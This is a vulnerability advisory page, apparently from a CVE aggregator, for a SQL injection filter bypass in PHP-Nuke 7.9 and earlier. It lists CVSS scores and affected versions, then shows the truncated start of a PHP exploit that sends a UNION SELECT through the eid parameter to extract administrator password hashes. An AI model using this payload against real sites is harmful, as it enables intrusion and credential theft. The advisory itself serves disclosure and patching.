5.1
CVSSv2

CVE-2006-5525

Published: 26/10/2006 Updated: 19/10/2017
CVSS v2 Base Score: 5.1 | Impact Score: 6.4 | Exploitability Score: 4.9
VMScore: 515
Vector: AV:N/AC:H/Au:N/C:P/I:P/A:P

Vulnerability Summary

Incomplete blacklist vulnerability in mainfile.php in PHP-Nuke 7.9 and previous versions allows remote malicious users to conduct SQL injection attacks via (1) "/**/UNION " or (2) " UNION/**/" sequences, which are not rejected by the protection mechanism, as demonstrated by a SQL injection via the eid parameter in a search action in the Encyclopedia module in modules.php.

Vulnerable Product Search on Vulmon Subscribe to Product

phpnuke php-nuke 7.0

phpnuke php-nuke 7.1

phpnuke php-nuke 7.8

phpnuke php-nuke

phpnuke php-nuke 7.6

phpnuke php-nuke 7.7

phpnuke php-nuke 7.4

phpnuke php-nuke 7.5

phpnuke php-nuke 7.2

phpnuke php-nuke 7.3

Exploits

<? /* Neo Security Team - Exploit made by Paisterist on 2006-10-22 wwwneosecurityteamnet */ $host="localhost"; $path="/phpnuke/"; $prefix="nuke_"; $port="80"; $fp = fsockopen($host, $port, $errno, $errstr, 30); $data="query=fooaa&eid=foo'/**/UNION SELECT pwd as title FROM $prefix_authors WHERE '1'='1"; if ($fp) { $p="POST /p ...